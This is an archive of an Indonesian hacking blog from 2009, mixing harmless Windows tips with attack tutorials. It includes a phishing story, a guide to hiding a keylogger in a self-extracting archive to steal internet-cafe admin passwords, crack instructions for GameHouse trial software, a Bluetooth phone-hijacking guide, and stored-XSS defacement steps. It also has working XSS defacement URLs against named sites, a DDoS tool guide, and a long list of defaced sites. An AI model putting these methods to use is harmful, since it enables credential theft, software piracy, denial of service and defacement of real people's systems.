Adi: Username nya apa?
Joe Killer: Liat aja di Profilku...
Adi: Wah! Kamu hebat ya! Kmu dah lvl 100! Dah maennya lama yaa?
Joe Killer: Sekitar 3 Bulan lah...
Adi: WAW!!! Ajarin aku dong!
Joe Killer: Ok, tapi aku akan ngasih trik yang paling extreme di FB!
Adi: Apa tuh?
Joe Killer: Ngehack FB orang tanpa pake kode apapun!
Adi: Wah! Mau-mau!!!
Joe Killer: Oke... sekarang kamu akan mendapat trik ini...
Adi: Cepet! Cepet!
Joe Killer: Gini caranya: kamu ketik sekarang! user:(email kamu) pass:(password kamu) target:(email target) Oke, Sekarang yaa!!!!!!
Adi: user:adikeren_99@yahoo.com pass:adiganteng target:devilishgirl_cantik@yahoo.com
Joe Killer: Oke... nanti kamu bakal dapet password target dari Facebook 3 Hari lagi! Kalo diliat dari komp aku, password kamu tetep ditutupin bulet-bulet! Aku baru tau...
Adi: Wah, thanks yaa!
Joe Killer: Sama-sama, biar kamu dapet passwordnya lebih cepet, mending kamu Logout dari FB sekarang ya! Nanti baru ol lagi sekitar jam 5 sore!
Adi: Oke! Aku Logout dulu ya!
Lalu... Adi-pun Logout dengan cepat! Secara Terang-terangan, Joe Killer juga logout dan langsung masukin email dan password yang dia dapatkan!
Lalu, Joe Killer mengganti password, dan email FB-nya si Adi.
Sorenya, saat Adi mau online lagi ternyata gak bisa login! Lalu dia hampir mau nangis... Abis itu, dia buka emailnya dan melihat email dari Joe Killer, isinya begini:

Halo Adi! hehehehehehehehehehe..... Kamu udah dibo'ongin! huakakakakakak!!! Kamu emank cupu! bodoh! sampe kamupun bisa di Phish olehku! Hahaha! perkenalkan, namaku sebenarnya adalah Joe Cracker! Lalu, sebenarnya aku tidak diremove dari teman-temanku! Aku juga sebenarnya memakai cheat di Mafia Wars, dan aku mulai bermain Mafia Wars baru 1 bulan yang lalu! Hahahahahahahahahahaha!!!!!! Dan satu lagi! Phiser adalah Pembohong dan suka mengambil password orang!!!
so...

Hacked by Joe Hacker

I'm the Hacker who traveling the time!!!
Have Fun!
----------- END OF CERITA-----------
Nah, kita udah tau kan cara memphish dengan cara yang gokil dan bodoh!
Oke... End of Posting....

Trik simpel yang diabaikan!

2009-08-21T11:20:00.002+07:00

Oke... apakah anda tau bahwa ada sebuah trik tersembunyi dari Windows XP?
Apakah anda ingin tau?
Yaitu "Kill Multiple Process tanpa Task Manager"!
Bisa nggak anda mematikan semua aplikasi secara bersamaan?
Mungkin anda tau, tetapi (katanya) banyak orang yang gak tau tentang cara ini...
Bagi yang gak tau, coba kita kasih tau...
Tekan dan Tahan tombol Ctrl, lalu klik kanan pada aplikasi mana saja pada taskbar, lalu klik Close Group.

End of Postingan Bodoh

Kontrol HP Orang lain via Bluetooth

2009-08-21T06:39:00.001+07:00

Dengan memakai Super Bluetooth Hack (Ada yang sama app-nya, tapi namanya beda, yaitu BT Info)
Nah, kalo mau download, coba Googling ato pake Opera Mini, trus pilih Application Download (di Bookmark kalo pertama kali download Opera Mini.) trus pilih Application, trus search aja Super Bluetooth Hack
Atau Download di SINI
Nah, kalo udah ada bahan-bahannya, kita langsung ke Tutor!!!
1. Buka SBH (Super Bluetooth Hack)
2. Pertama kali pake, coba ke setting trus ganti Saving File To jadi directory yang kamu mau (dua-duanya)
3. Balik ke menu, trus Connect
4. Akan ditanyakan mau pake Bluetooth dan pilih yes atau iya atau sebangsanya
5. Pilih mana aja yang mau dihack, Trus kalo bisa, biasanya korban ditanyain boleh terkoneksi gak, trus kalo bisa, biasanya dikasih secret code oleh korban, jadi harusnya kamu hacknya kasih tau dulu kamu mau kirim file apa, trus dia kasih tau kodenya, trus kamu hack dia!

Sehabis itu, kamu bisa komandoin HP korban, (tapi agak susah)

-----END-----

Cracking GameHouse

2009-08-20T19:12:00.004+07:00

Anda pasti tau Gamehouse (Permainan rumah, Ya enggak lah!!!)
Semua orang boleh download tetapi masih trial version, kita harus bayar kalo mau maen sepenuhnya dan SELAMANYA!!! Nah, kita akan membahas tentang membuat Trial Version menjadi Full Version! (WAAAAW!!!)
Meluncur ke Tutor!
Eits! ada persiapannya!!!
- Komputer (pastinya!!! kalo gak ada gimana cara ngecracknya???)
- Game yang sudah didownload dari www.gamehouse.com aka korban (Yaiyalah!!! Kalo gak ada ini, apa yang mau di crack???) Misalnya: Luxor 2
- Tools OllyDbg v1.10, download di link ini http://www.ollydbg.de/odbg110.zip

Kalo udah siap, langsung meluncur ke Tutor!
1. Install Luxor 2 ke PC, nah, kan disitu ada tulisan batas waktu pemakaian. Liat Gambar:

2. Buka tools OllyDdg v.1.10 lalu Open, cari lokasi Game Luxor 2 disimpan, nah, yang kita akan open adalah file berekstensi .dll, yang merupakan komponen penting dari game tersebut, yang kita cari dan buka filenya (yang dianiaya) adalah luxor2res.dll. Gambar:

3. Kalo kebuka, tekan CTRL+F lalu ketik "call isTrial" lalu tekan Find. Gambar:

4. Jika sudah ketemu, tekan Enter, Liat gambar:

5. Setelah itu, klik 2x maka akan muncul kotak dan ganti isi dengan "MOV EAX,0" Liat Gambar:

^^^Merubah menjadi Full Version^^^
6. Setelah itu, klik kanan di sembarang tempat (tapi jangan di desktop) lalu pilih copy to executable lalu klik all modification (Liat aja Gambar, bos...)

7. Pilih copy all

8. Lalu klik kanan, pilih Save file, lalu seterusnya pilih YES (Seperti Gambar)

Coba jalankan Luxor 2!

Seperti di gambar, dari Trial Version menjadi Full Version

Udah deh... Selamat Mencoba dan Selamat Bermain!!!
NOTE!!! Tidak berlaku untuk Game 2008 keatas!

Sumber: www.spyrozone.net tetapi ditulis oleh RaY-29

Darkness Hacker ganti Banner!!!

2009-08-20T17:11:00.002+07:00

Yep... daripada cuma gambar sama teks... Mending bikin Banner baru nih... lebih OK!
Please pasang banner ini diwebsite anda... dan kasih tau saya kalo anda mau Tukeran Link...
Oke... Keep Sharing... Keep Hacking... Keep Defacing... And Keep Blogging...

Foxy Proxy

2009-08-19T16:22:00.002+07:00

Bagi Para Hacker pengguna Mozilla si serigala api (Mozilla Firefox), Ada add-ons Foxy Proxy untuk setup Proxy!

Download di SINI

Hati-hati, kalo mau berselancar, mendingan jangan pake proxy... LAMAAAAAAAAA!!!!!!!!!!!!!
Parah banget komputer gw jadi NGELAAAAAAAAAG!!! Gara-gara pake Proxy!

Yaudah... untuk kebutuhan Hacking aja ini... Plus mau mengkaji blog maling yang merusak citra bangsa kita Indonesia, kan itungnya per IP... jadi, kaji, pake proxy, kaji, ganti proxy, kaji, ganti proxy, kaji, ganti proxy, dan seterusnya.............. (Cape dan NGELAAAAAAG!!!)

Cara Deface termudah via Guestbook atau Comment

2009-08-18T19:39:00.003+07:00

Nah, selamat datang di The Darkness Hacker!!!
Kita akan membahas tentang cara termudah Deface via GB
Apa itu Guestbook? Guestbook adalah Buku Tamu, Apa itu Buku Tamu? Itu loh, yang didepan Ruangan/Restoran buat Pernikahan nah, kan ada buku, bisa tulis nama, alamat, umur, komentar.... (Halah! Becanda doank, jangan seserius itu donk liatnya...)
Buku Tamu adalah fasilitas dalam sebuah Website isinya adalah komentar-komentar dari pengunjung, biasanya ada beberapa orang yang memberikan fasilitas Guestbook ini.

Nah, buat ngedefacenya, kita pake XSS, tau kan cara XSS? nah, kalo kita dapet dari fasilitas Search yang hanya bersifat "Temporary" (Gak permanen) nah, kalo di Guestbook bersifat "Permanent" karena Guestbook menyimpan message kedalam Database.

Nah, caranya adalah, masukin aja HTML code yang "Mematikan" contoh:
Liat di Basic of XSS yang bagian bawah, nah, udah selesai...

End of Postingan

The Hacker: Mencari Hacker, Lewat Om Google...

2009-08-17T20:00:00.002+07:00

Kembali ke The Hacker Mencari Hacker lewat Google...
Diacara kali ini, kami akan Membahas tentang para Hacker Indonesia untuk merayakan HUT RI kemerdekaan!
Oke...
Dimulai dari:
IrFan_1933 jatimcrew:
http://sexygfs.info/fuck.php
http://www.markettheme.com/fuck.php
http://bestweboffers.info/fuck.php
http://debtservicesonline.info/fuck.php
http://thedailyreportnews.us/fuck.php
http://myphiladelphiaautos.com/fuck.php
http://adsquaremedia.com/fuck.php
http://www.mywildwoodhotels.com/fuck.php
http://myphiladelphiarestaurants.com/fuck.php
http://affiliate-linked.com/fuck.php
http://markhoppustwitter.com/fuck.php
http://mithilapaintings.net/fuck.php
http://www.codevilla.in/fuck.php
http://affiliatemarketingcollege.com/fuck.php
http://mypoconodoctors.com/fuck.php
http://quickwpsite.com/fuck.php
http://shimlaapples.com/fuck.php
http://affiliatemarketingedu.com/fuck.php
http://bucks-county-singles.com/fuck.php
http://www.cosmicblogger.com/fuck.php
http://careerpreceptor.com/fuck.php
http://myphiladelphialawyers.com/fuck.php
http://pettoopals.info/fuck.php
http://myphiladelphiaclubs.com/fuck.php
http://tflmarketing.com/fuck.php
http://twitterbritneyspears.com/fuck.php
http://codehut.in/fuck.php
http://www.iamjaredtysak.com/fuck.php
http://wpdemos.com/fuck.php
http://www.seenonthetv.com/fuck.php
http://wordpressaffiliateplugin.com/fuck.php
http://www.ilovelaurenwright.info/fuck.php
http://mileypictures.info/fuck.php
http://celltherapeuticsbrostallicin.com/fuck.php
http://celltherapeuticsopaxio.com/fuck.php
http://myphiladelphiadoctors.com/fuck.php
http://celltherapeuticspixantrone.com/fuck.php
http://montgomerypasingles.com/fuck.php
http://communityaffiliatemarketing.com/fuck.php
http://debt-help-online.info/fuck.php
http://contentspring.com/fuck.php
http://planesneekers.com/fuck.php
http://writetomyblog.com/fuck.php
http://mypoconohotels.com/fuck.php
http://findmyadultfriend.info/fuck.php
http://wordpress.corephpdemos.com/images/fuck.php
http://65.181.187.38/fuck.php
http://www.markettheme.com/fuck.php
http://www.movabletype4.org/fuck.php
http://demo.wpcheckout.net/fuck.php
http://mypoconorestaurants.com/fuck.php
http://themebazaar.com/fuck.php
http://careerpreceptor.com/fuck.php
http://mypoconoactivities.com/fuck.php
http://gijio.com/fuck.php
http://freecollegesearches.com/fuck.php
http://myphiladelphiasalons.com/fuck.php
http://teeth-whitening-info.info/fuck.php
http://mywildwoodrestaurants.com/fuck.php
http://myphiladelphiadentists.com/fuck.php
http://healthcareplanshelp.info/fuck.php
http://community-affiliate-marketing.com/fuck.php
http://how-to-build-muscle.info/fuck.php
http://howtogetrichonline.info/fuck.php
http://mycommunitybusinesses.com/fuck.php
http://loseweightwithacai.info/fuck.php
http://sellmygoldnow.info/fuck.php
http://losing-weight-help.info/fuck.php
http://mailer839.info/fuck.php
http://mypoconosalons.com/fuck.php
http://www.wedontlikeobama.com/fuck.php
Wuah.... Buanyak buanget suanget juanget tuanget manget kebelet kelelep...
Lalu...
BABY CORP
http://www.duaberita.com/main/nasional/news/586-hacked-by-baby-corp.html
http://indoclicker.com/view_offer.php?id=205
http://bejo.jaylangkung.com/?m=200908
Sorry... Menurut saya cukup buanyak nih...
Terima Kasih...

Selamat Ulang Tahun Indonesia...

2009-08-17T11:12:00.002+07:00

Deface Massal pun berlangsung...
Saya mau pake bug XSS dan buat screenshot, lalu dipost deh disini dan di pesbuk...
Ok... Inilah hasil aniaya websitenya:
1. Emugle
Link: http://www.emugle.com/search.php?q=%3Ccenter%3E%3Cimg+src%3D%22http%3A%2F%2Fi26.tinypic.com%2Fxm52qc.gif%22%3E%3Cbr%3E%3Ch1%3EDirgahayu+Indonesia+ke+64%3Cbr%3EHacked+by+ne0+d4rk+fl00d3r%3C%2Fh1%3E%3C%2Fcenter%3E&t=All+categories&Submit=Search&f=0
Screenshot: http://img89.imageshack.us/img89/3272/emuglehackedbyne0.jpg
2. flisterz:
Link: http://www.flisterz.com/?s=%3Ccenter%3E%3Cimg+src%3D%22http%3A%2F%2Fi26.tinypic.com%2Fxm52qc.gif%22%3E%3Cbr%3EDirgahayu+Indonesia+ke+64%3Cbr%3EHacked+by+ne0+d4rk+fl00d3r%3C%2Fcenter%3E
Note: Tulisan gak keliatan soalnya warna hurufnya putih... ^_^
3. Daily Express
ScreenShot: http://img190.imageshack.us/img190/9082/dailyexhackedbyne0.jpg
4. MATTA
Screenshotnya disini: http://img29.imageshack.us/img29/6851/mattadefacedbyne0d4rkfl.jpg

Selamat ulang tahun Indonesia!!!
Inilah cara para hacker untuk merayakan kemerdekaan!!! ^_^

FTP Attack

2009-08-16T14:42:00.000+07:00

Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service. Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang.

Tidak pernah atau jarang mengupdate versi server dan mempatchnya adalah kesalahan yang sering dilakukan oleh seorang admin dan inilah yang membuat server FTP menjadi rawan untuk dimasuki. Sebagai contoh adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang selalu di upgrade dua kali dalam sehari untuk memperbaiki kondisi yang mengizinkan terjadinya buffer overflow. Mengexploitasi FTP juga berguna untuk mengetahui password yang terdapat dalam sistem, FTP Bounce attack (menggunakan server ftp orang lain untuk melakukan serangan), dan mengetahui atau mensniff informasi yang berada dalam system

End of Posting

Beberapa hal yang harus diperhatikan bagi para Hacker atau Wannabe a Hacker

2009-08-16T14:07:00.001+07:00

Janganlah lihat film-film yang mengisahkan tentang Hacker lalu dia menjadi seseorang yang dihormati oleh seluruh bangsa!
Apakah anda memikirkan Hacker itu hidup kaya raya, senang, bahagia, dll.?
Hacker kehidupannya biasa saja... Mereka tidak pernah bertambah kaya hanya karena nge-Hack....

Pikirkanlah apa tujuanmu untuk menjadi Hacker. Pernah tidak anda merasakan kesedihan ibunda tercinta anda menangis tersedu-sedu karena anaknya diseret ke penjara karena Hacking?

Mungkin anda bisa dari Hacking menjadi Web Developer di Kantor anda, tetapi tidak ada pekerjaan yang mengandalkan tekhnik hacking sepenuhnya di Kantor...

Hacker itu tidak pernah dipandang "2 Mata" oleh orang-orang...
Walaupun para "White Hats" berkata Hacking is Art, Hacking is not a crime, Hacker tidak sepenuhnya jahat, dll.
Tapi tetap saja orang-orang bilang, Hacker itu jahat, Hacker itu merusak, Hacking itu tindak kriminal, dsb.

Jadi, bagi para hacker, wannabe hacker, newbie hacker... Pikirkan apa tujuan anda menjadi seorang hacker...

--END--

Mendapat password admin warnet yang memakai aplikasi Indobilling

2009-08-16T11:29:00.005+07:00

Bagi yang baca di Facebook, silahkan ke www.darknezzhacker.co.cc karena tutorial ini disertai Gambar, kalo di Facebook kan gak bisa...

Apakah anda ingin mendapat password admin aka mas-mas/mbak-mbak di warnet yang memakai aplikasi Indobilling? Anda bisa mendapat jawabannya!!! Tapi bos, bos harus punya ID Spyrozone dulu, trus download Indologger di Members Area-nya Spyrozone.net (klik download trus pilih Indologger trus Download...) Nah, kita juga membutuhkan WinRAR di kompi warnet (www.rarlab.com) Lalu juga siapkan dokumen .txt atau .doc yang isinya asal-asalan untuk menyamarkan Indologger. Ayo kita langsung meluncur ke tutor!!!
1. Pilih semua dokumen penyamar dan Indologger lalu Add to Archive.
Kayak gambar ini:

2. Nah, Jendela WinRAR Dialog kan udah kebuka, nah isi Archive Name sesuka hati anda, contoh: Lampiran.exe dan Contreng Create SFX archive di Kotak Archiving Option. Seperti Gamabar dibawah ini:

3. Lalu Klik Tab Advanced lalu SFX Option lalu klik opsi Create in current folder, lalu pada tab general, lalu, isikan indologger.exe di Run After Extraction, dengan begitu, abis extract, indologger.exe akan berjalan otomatis di kompi korban yang mengextract. Gambarnya dibawah ini:

4. Klik tab Modes pilih opsi Hide All dan Overwrite All Files, klik OK untuk menyimpan konfigurasi dan klik OK lagi untuk memulai Packing. Gambar dibawah:

5. Salin file Lampiran.exe ke Flash Disk anda dan INGAT!!! Nama Volume label Flash Disk anda harus SPYROZONE (HARUS lho... kalo nggak, gagal...) Seperti gambar dibawah ini:

6. Saatnya Social Engineering!!! Datangi si Admin aka Operator aka Pemilik aka mas-mas/mbak-mbak Misalnya mau ngeprint Nah, cara socengnya misalnya begini:
Kamu aka Pembohong aka Pelaku aka Pemakai Indologger disingkat: P
Admin aka Operator aka Pemilik aka mas-mas/mbak-mbak disingkat Op

VS
Hacker VS Operator

P: Mas, saya mau ngeprint nih... (sambil menyodorkan Flash Disk anda)
Op: (Mencolokan FlashDisk ke Kompi) Yang mana Filenya de?
P: Yang Lampiran, coba diextract (Secara backgound, Indologger pun beraksi)
Op: Yang mana yang mau diprint?
P: Yang "Itu" (Itu yang berarti yang mana aja kecuali Indologger lho...)
Udah selesai dan jangan lupa mengucapkan terimakasih (telah memberikan passwordmu kepadaku! )

Kembali ke KOMPI.....mu! (kayak Tukul kembali ke Laptop!)
Nah, ada file yang bernama "spyrozone.net" kan di flashdisk mu? Buka file tersebut dengan Notepad, lalu cari password sang Operator... Nah, gambar dibawah ini adlah contoh dari Spyrokid yang mensocengi Warnet di Surabaya yang bernama *********** (asterix)

Nah, disitu kan nama admin riska dan password eM95111

Nah... Udah tau kan caranya? Dan Selamat Bersenang-sanang bos!

Sumber: Spyrozone.net
Special Thanks to: Spyrokid

Awas!!! HOAX Datang!!!

2009-08-16T09:01:00.002+07:00

Sebelum saya kasih tau apa HOAX-nya... Anda harus tau, apa itu HOAX? HOAX adalah berita bohong alias Ngibul alias Menyesatkan dan aka Berita yang tidak terpercaya!
Nah, biasanya HOAX meminta (yang mulia raja) yang terkirim HOAX aka victim aka penyebar aka korban HOAX untuk memfoward HOAX itu ke orang lain

Nah... HOAX yang lagi "Beken" adalah, begini isinya (dari Facebook):

PENTING - MOHON DIBACA - JANGAN DIACUHKAN
MOHON BACA PESAN INI - PERINGATAN YANG SANGAT PENTING

# Jika anda menerima panggilan telepon dari seseorang dengan no.telp
yang tidak dikenal atau terdaftar, berkata bahwa dia (pria/wanita)
berasal dari divisi engineering/ teknisi perusahaan salah satu
vendor/operator cellphone yang ingin memeriksa sambungan telepon atau
sinyal atau dengan alasan apapun, dan selanjutnya dia berkata bahwa
kita harus menekan tombol # 90 atau #09 atau nomor apapun (bisa juga
dengan kode huruf), secepatnya matikan/putuskan sambungan telepon
tersebut tanpa menekan tombol yang mereka minta. karena saat ini ada
penipu-penipu yang menggunakan peralatan dimana jika anda menekan
tombol #90 atau #09 maka penipu-penipu tersebut dapat mengakses SIM
card telepon kita dan mereka dapat menggunakan line anda dengan dan
atas biaya anda.

Mohon forward email ini kepada seluruh teman anda untuk mencegah
tindak kriminal ini. dan juga ada beberapa issue lainnya.

# Jika anda menerima telepon di telepon genggam/cellphone dan layar
cellphone anda menampilkan display seperti ini : (XALAN).

JANGAN MENERIMA SAMBUNGAN TELEPON TERSEBUT, HARAP LANGSUNG MATIKAN TELEPON ANDA DENGAN MENEKAN TOMBOL POWER (ON/OFF) CELLPHONE ANDA..

Karena jika anda menerima sambungan telepon tersebut maka cellphone
anda akan terkena virus. virus ini akan menghapus seluruh IMEI dan
Informasi IMSI dari cellphone dan SIM card anda, dimana selanjutnya
anda akan terputus hubungan sama sekali dari

vendor/operator manapun. (dimana anda harus mengganti cellphone dan
SIM card anda dengan yang baru). Informasi ini telah dikonfirmasi
dengan Motorola and Nokia.. saat ini terdapat lebih dari 3 juta
telepon genggam/cellphone yang terkena Virus ini. anda pun dapat
membaca berita ataupun informasi mengenai hal ini di situs web CNN.

MOHON PESAN INI DAPAT DILANJUTKAN KEPADA TEMAN-TEMAN

Saya pertama kali liat ini kayaknya ini HOAX, jadi gak saya apa-apain...
Trus ini ada 2 orang yang ngasih HOAX lagi... (Duh...)
Trus, akhirnya ada pencerahan... Saya dapet message dari TECON tentang HOAX ini... ternyata ini adalah BENERAN HOAX!!!

Cara menganalisa ini HOAX atau bukan:
- Gak ada logikanya...
- Ada tulisan (ajakan atau permohonan) supaya kita memfoward pesan ini
- Apalagi kalo tentang kutukan setan, kamu akan dinikahi setan, dll. pasti itu SMS atau Email HOAX!

Gitu aja deh...
Jadi, jangan ketipu yang namanya HOAX!!!

Cara liat website yang kerjaanya ngeredirect (50% Illegal, 50% Membantu)

2009-08-15T20:03:00.003+07:00

INGAT!!! Trik ini sangatlah illegal! Juga sangatlah membantu bagi Developernya! (Mungkin)

Kalo mau lihat website yang udah keredirect, tau gak artinya apa? Misal, saya kan buat account di www.co.cc, saya harus nunggu 2 Hari ato kurang, nah, darknezzhacker.blogspot.com tidak bisa diakses karena sudah keredirect ke www.darknezzhacker.co.cc sedangkan www.darknezzhacker.co.cc belum selesai, nah... kalo mau ngeaksesnya ke oblivionzone.tk, nah, dari dot tk ternyata bisa... Gitu ceritanya...

Let's go to tutor!
Sebelumnya, Bahan-bahannya adalah:
- account www.dot.tk (Tau gak? Itu lhoo... jasa URL Forwarding sama Mail Forwarding)
- Tanggung Jawab jika ada keluhan dari Developernya

Kalo diatas semuanya udah terpenuhi kita langsung ke ~~jalan tol~~ tutorial:
1. Login ke dot tk
2. Klik Domain Saya, trus Tambahkan Domain baru trus Tulis nama domain anda terserah (contoh: tesweb.tk)...
3. Klik aja Lanjut, trus pilih domain gratis aja (kalo mau domain bayar gak apa-apa, tapi ngapain juga... kan cuma buat beginian...) trus Lanjut...
4. Ketik URL Refferer URL korban anda, lalu isi verification code, lalu OK...

Udah dah... tinggal buka tesweb.tk akan keluar web aslinya...

Gitu aja deh....
Demikian Posting kali ini...........

Taskbar Samping BARU!!!

2009-08-15T10:34:00.002+07:00

Setelah bermenit-menit, setelah berdetik-detik...
Akhirnya selesai juga Taskbarnya...

Taskbar ini bener-bener unik dan aneh...

Komentari Taskbarku! di Postingan ini...

Gerakin Cursor tanpa Mouse (pake Keyboard)

2009-08-15T09:02:00.002+07:00

Ada trik baru nih...
Ayo... Ayo...
Langkah-langkah:
1. Tekan tombol alt+shift+num lock
2. Keluar popup buat korsor pake keyboard, klik ok
3. Nah, cara pakenya, klik aja 1 untuk serong kiri bawah, 2 bawah, 3 serong kanan bawah, 4 kiri, 5 klik kiri, 6 kanan, 7 serong kiri atas, 8 atas, 9 serong kanan atas
4. Kalo udah bosen dan gak mau lagi alias mau didisable, klik lagi alt+shift+num lock lalu klik cancel
Note: kalo alt+shift+num lock-nya kadang-kadang harus 2x klik sampe 3x klik...

Oke... gitu aja deh...

DDoS Tool

2009-08-15T07:58:00.002+07:00

Ayo kita download DDoS tool ini...
Namanya kalo gak salah Mega Death by: kiraNL

Oke, tanpa panjang lebar, meluncur aja ke SINI

Udah? Kalo udah buka filenya, ~~dijilat, dicelupin~~ masukkan alamat IP korban, kalo gak tau IP korban, klik Toolz pada Menubar lalu URL to IP Converter, trus tekan tombol ~~1 untuk meninggalkan pesan~~ "Attack"

Kalo servernya kuat, pake beberapa kompi sekaligus dan kurangi intervalnya...

Sumber: TECON group on Facebook dipost oleh: Kijeng Mabur

Manifestoku

2009-08-14T16:50:00.002+07:00

Saat semuanya terlelap...
Saat semuanya tertidur...
Kami bangkit dan mencari seluruh informasi...
Berbagi dengan yang lain...
Mencari cari kepingan informasi
Untuk kami bagikan kepada orang lain...
Walaupun kalian menyebutku jahat...
Tetapi kami tetap beraksi...
Mencari serpihan informasi....
Bukan karena uang...
Bukan karena tahta...
Tetapi karena...
PENGABDIAN

By: Reo aka X_Oblivion aka ne0 d4rk fl00d3r

FAQ

2009-08-13T18:03:00.002+07:00

Ini adalah FAQ yang berisi pertanyaan yang biasa ditanyakan kepada seorang Hacker.

Q: Bagaimana cara menjadi seorang hacker?
A: Pelajarilah kode-kode pemograman dan jelajahilah internet untuk mencari tutorial.

Q: Bagaimana saya memulainya?
A: Cobalah kode phyton karena phyton adalah code yang termudah, lalu JavaScript yang lebih cepat dari phyton, selanjutnya anda bisa melanjutkan ke LINUX lalu Perl (untuk lebih lanjut)

Q: Apakah seorang hacker memakai tools?
A: Semua hacker memakai tools yang bernama "Browser", "Notepad", dan "Command Prompt". Mungkin untuk keperluan internet atau melacak IP dll. sebagian hacker memakainya, tetapi sebagian hacker juga memakai tools yang benar-benar hanya untuk hacking tapi mereka disebut "Lamer"

Q: Bagaimana cara menghack Billing Warnet?
A: Untuk Apa? Jika anda memakainya untuk hal yang negatif, anda harus tau bahwa warnet sudah memberikan harga yang (cukup) murah untuk berinternet, walaupun saya membuat artikel hack billing warnet, tapi saya memposting hanya untuk berbagi pengetahuan untuk anda.

Q: Bagaimana cara memakai tools blablabla?
A: BRm!!! (Baca ReadMe-nya!!!)

Q: Saya pernah mendengar anda mendeface situs dan dibayar, apakah anda mau mendeface sebuah situs dan akan saya bayar sekian Milyar?
A: Tidak!!! (kalo untuk donasi doang boleh tapi kalo untuk urusan negatif gak mau!!)

THE END

DDoS

2009-08-13T17:31:00.002+07:00

DDoS attack adalah Distributed-Denial-of-Serv

ice attack, sebuah usaha untuk membuat suatu sumber daya komputer menjadi tidak bisa dipakai oleh user-nya, dengan menggunakan ribuan zombie system yang ‘menyerang’ secara bersamaan. Tujuannya negatif, yakni agar sebuah website atau layanan online tidak bisa bekerja dengan efisien atau bahkan mati sama sekali, untuk sementara waktu atau selama-lamanya. DDoS attack adalah salah satu model dari DoS ( denial-of-service) attack.

Target serangan DoS attack bisa ditujukan ke berbagai bagian jaringan. Bisa ke routing devices, web, electronic mail, atau server Domain Name System.

Ada 5 tipe dasar DoS attack :

1. Penggunaan berlebihan sumber daya komputer, seperti bandwith, disk space, atau processor.
2. Gangguan terhadap informasi konfigurasi, seperti informasi routing.
3. Gangguan terhadap informasi status, misalnya memaksa me-reset TCP session.
4. Gangguan terhadap komponen-komponen fisik network.
5. Menghalang-halangi media komunikasi antara komputer dengan user sehingga mengganggu komunikasi.

DoS attack juga termasuk eksekusi malware, yang dimaksudkan untuk :

* Memaksimalkan kerja processor, sehingga memblok tugas-tugas yang lain.
* Memicu terjadinya error di dalam microcode.
* Memicu error pada urutan instruksi dan memaksa komputer menjadi tidak stabil dan locked-up.
* Memanfaatkan error-error yang ada di system operasi yang berbuntut pada ‘kematian’ system.
* Membuat system operasi menjadi crash.
* iFrame (D)DoS, di dalamnya terdapat sebuah dokumen HTML yang sengaja dibuat untuk mengunjungi halaman web ber-kilobyte tinggi dengan berulang-ulang, hingga melampaui batas bandwith.

Gejala-gejala DDoS attack :

* Kinerja jaringan menurun. Tidak seperti biasanya, membuka file atau mengakses situs menjadi lebih lambat.
* Fitur-fitur tertentu pada sebuah website hilang.
* Website sama sekali tidak bisa diakses.
* Peningkatan jumlah email spam yang diterima sangat dramatis. Tipe DoS yang ini sering diistilahkan dengan “Mail Bomb”.

Contoh kasus DoS attack :

1. Februari 2007, lebih dari 10.000 server game online seperti Return to Castle Wolfenstein, Halo, Counter-Strike, diserang oleh group hacker “RUS”. DDoS attack berasal dari 1.000 lebih komputer yang terletak di negara bekas Uni Sovyet. Kebanyakan berasal dari Rusia, Uzbekistan dan Belarusia.
2. Juli 2008, banyak blog milik blogger-blogger konservatif, termasuk Macsmind.com, merasa mendapat serangan DDoS attack hingga beberapa terpaksa harus offline. Serangan ini dikaitkan dengan 3 IP address yang diregister melalui GoDaddy.com ke barrackobama.com, situs resmi calon presiden AS dari partai Demokrat, Barrack Obama. Sebelumnya, beberapa pendukung Obama juga melakukan serangan ke situs-situs pendukung Hillary Rodham Clinton dengan menggunakan google.com. Sampai 8 Agustus kemarin, asal pasti serangan masih belum jelas, namun Obama atau tim kampanyenya secara personal dianggap terlibat.

Di CoPas dari Discussion Group TECON di Facebook oleh Kinjeng Mabur

-[†]- Darkness Hacker -[†]-

Pindah ke http://www.neodark.co.tv/

Ganti hosting...

Bikin Virus Sederhana yuk!

Lock Web

Deathly Dork untuk deface...

ASP Injection

Desain Logo Tecon (isenk-isenk...)

FTP Attack

Enskripsi File menjadi image

UserScript untuk mencurangi KumpulBlogger

Keyboard Rusak?

Destroy the Admin's Computer!!! plus seisi Warnet!

Anti Facebook

Directoryku yang baru

Penghancuran Warnet (Hanya sedikit pemikiran dari otak kami)

UserScript Anti Tunggu Download Free User Rapidshare dan 4shared

Tutorial RFI (Yang ditunggu-tunggu dan dinanti-nanti)

UserScript Isengin temen yang pake Gmail

Cara ganti harga Paypal jadi $0.01

Blind SQL Injection

Saya mendukung Indonesian Security Confrence

Aku mendukung Idsecconf 2009!

NEW DEFACED GUESTBOOK!!!

Secret Code HP Nokia

Bug XSS on Indosiar.com

Facebook Hacking (Online di kompi tanpa terlihat online)

DDoS Reloaded

Smiley JavaScript (100% Illegal)

Robots.txt

Menembus blocked Website ato IP kita sendiri keblok...

Ghostly Shoutmix

Stupid Moderation (Operator Warnet)

Hack Pesawat Telepon yang Terkunci

Selamat Hari Raya Idul Fitri

Cara memakai Exploit dari Milw0rm (SQLi Only)

The Hacker, Mencari Hacker Lewat Om Google, The Dead of Noordin M Top Series...

SQL Injection Full Version Revolution

JADOEL TRICKS DEFACE WEBSITE (Joomla)

Rusuh di Blitzmegaplex lewat Komputer

Hack Lift

Times Up, Rapidshare!!! (Rapidshare Hacking)

Hmm, situs Deddy Corbuzier udah direpair toh...

Jatimcrew is Back!

Buat dan Delete Folder dengan VB aka Visual Basic

Jatimcrew kena DDoS sama Dark Malaysia (Dari seminggu lalu)

Windows Hacking: Manipulasi Localhost

Cara Kerja KumpulBlogger (Mungkin semua situs setipe KumpulBlogger juga pake system kayak gini...)

Bugs masih anget!!! (Barusan diupdate...) XSS + SQLi

HOAX Virtual Card for you

Lebih jauh tentang diriku...

Cara Seorang Hacker: Mencari Admin Login tanpa mantra... (Iye, tapi pake google...)

Penyempurnaan Restart Code pada Symbian (untuk kebaikan)

Bug Joomla Component

Chat Facebook tanpa buka situs Facebooknya

